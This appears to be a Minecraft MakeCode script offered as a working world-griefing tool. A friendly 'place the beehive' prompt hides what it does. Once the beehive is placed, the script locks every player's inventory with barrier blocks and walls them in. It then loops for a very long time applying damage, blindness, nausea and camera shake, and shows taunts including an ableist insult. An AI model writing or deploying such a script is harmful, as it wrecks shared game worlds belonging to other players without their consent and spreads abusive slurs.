// YES I CODE IN MINECRAFT CMDS - https://github.com/Lumi-f3m

player.execute("/title @s subtitle Place the beehive down to start :)")
mobs.give(mobs.target(NEAREST_PLAYER),BEEHIVE,1)

blocks.onBlockPlaced(BEEHIVE, function(){

    player.execute('/replaceitem entity @a slot.hotbar 0 barrier 64 1{"minecraft:item_lock":{ "mode": "lock_in_slot" }, "minecraft:keep_on_death":{}}')
    player.execute('/replaceitem entity @a slot.hotbar 1 barrier 64 1{"minecraft:item_lock":{ "mode": "lock_in_slot" }, "minecraft:keep_on_death":{}}')
    player.execute('/replaceitem entity @a slot.hotbar 2 barrier 64 1{"minecraft:item_lock":{ "mode": "lock_in_slot" }, "minecraft:keep_on_death":{}}')
    player.execute('/replaceitem entity @a slot.hotbar 3 barrier 64 1{"minecraft:item_lock":{ "mode": "lock_in_slot" }, "minecraft:keep_on_death":{}}')
    player.execute('/replaceitem entity @a slot.hotbar 4 barrier 64 1{"minecraft:item_lock":{ "mode": "lock_in_slot" }, "minecraft:keep_on_death":{}}')
    player.execute('/replaceitem entity @a slot.hotbar 5 barrier 64 1{"minecraft:item_lock":{ "mode": "lock_in_slot" }, "minecraft:keep_on_death":{}}')
    player.execute('/replaceitem entity @a slot.hotbar 6 barrier 64 1{"minecraft:item_lock":{ "mode": "lock_in_slot" }, "minecraft:keep_on_death":{}}')
    player.execute('/replaceitem entity @a slot.hotbar 7 barrier 64 1{"minecraft:item_lock":{ "mode": "lock_in_slot" }, "minecraft:keep_on_death":{}}')
    player.execute('/replaceitem entity @a slot.hotbar 8 barrier 64 1{"minecraft:item_lock":{ "mode": "lock_in_slot" }, "minecraft:keep_on_death":{}}')
    player.execute('/replaceitem entity @a slot.hotbar 9 barrier 64 1{"minecraft:item_lock":{ "mode": "lock_in_slot" }, "minecraft:keep_on_death":{}}')
    player.execute('/tickingarea add ~5 ~5 ~5 ~-5 ~-5 ~-5 Lumi_f3m')
    player.execute('/gamerule sendcommandblockfeedback false')
    player.execute('/tp @a ~14.5 ~ ~-14.5')
    player.execute('/fill ~25 ~-2 ~ ~2 ~5 ~-25 border_block')
    loops.pause(2000)

    for (let index = 0; index < 999999; index++) {
        loops.pause(1)
            player.execute('/gamemode a @a')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/title @a title §l§4RAIDED BY Lumi_f3m')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/title @a subtitle §l§4GET NUKED L')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/replaceitem entity @a slot.weapon.mainhand 1 barrier 64 1{"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/replaceitem entity @a slot.armor.head 1 carved_pumpkin 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/scoreboard objectives add Lumi_f3m dummy')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/scoreboard objectives setdisplay sidebar Lumi_f3m')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/scoreboard players set §l§4RAIDED_BY_Lumi_f3m 10')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/scoreboard players set §l§4LOVE_IT_YET? 9')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/scoreboard players set §l§4Lumi_f3m_BETTER 8')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/scoreboard players set §l§4SPED_KID_LMAO 7')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/scoreboard players set §l§4GET_NUKED 6')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/gamerule sendCommandFeedback false')
        player.execute("/gamerule commandBlockOutput false")
        player.execute('/title @a actionbar §l§aJOIN RUDIANCE TODAY')
        player.execute('/gamerule tntexplodes true')
        player.execute('/camerashake add @a 99999999 rotational')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/camerashake add @a 99999999 rotational')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        player.execute('/execute at @a run playsound mob.enderdragon.death @a ~ ~ ~ ')
        player.execute('/replaceitem entity @a slot.armor.chest 1 leather_chestplate 1 1 {\"minecraft:item_lock\":{ \"mode\": \"lock_in_slot\" }, \"minecraft:keep_on_death\":{}}')
        player.execute('/replaceitem entity @a slot.armor.legs 1 leather_leggings 1 1 {\"minecraft:item_lock\":{ \"mode\": \"lock_in_slot\" }, \"minecraft:keep_on_death\":{}}')
        player.execute('/replaceitem entity @a slot.armor.feet 1 leather_boots 1 1 {\"minecraft:item_lock\":{ \"mode\": \"lock_in_slot\" }, "minecraft:keep_on_death":{}}')
        player.say('§l§cNUKED BY Lumi_f3m')
        player.say('§l§5UNRECOVERABLE WORLD LMAOOO')
        player.execute('/replaceitem entity @a slot.weapon.offhand 1 totem_of_undying 1 1 {"minecraft:item_lock":{"mode":"lock_in_slot"},"minecraft:keep_on_death":{}}')
        player.execute('/effect @e instant_damage 9999999 255')
        player.execute('/effect @a blindness 99999 255')
        player.execute('/effect @a darkness 99999 255')
        player.execute('/effect @a nausea 99999 255 true')
        loops.pause(1)

    }
})
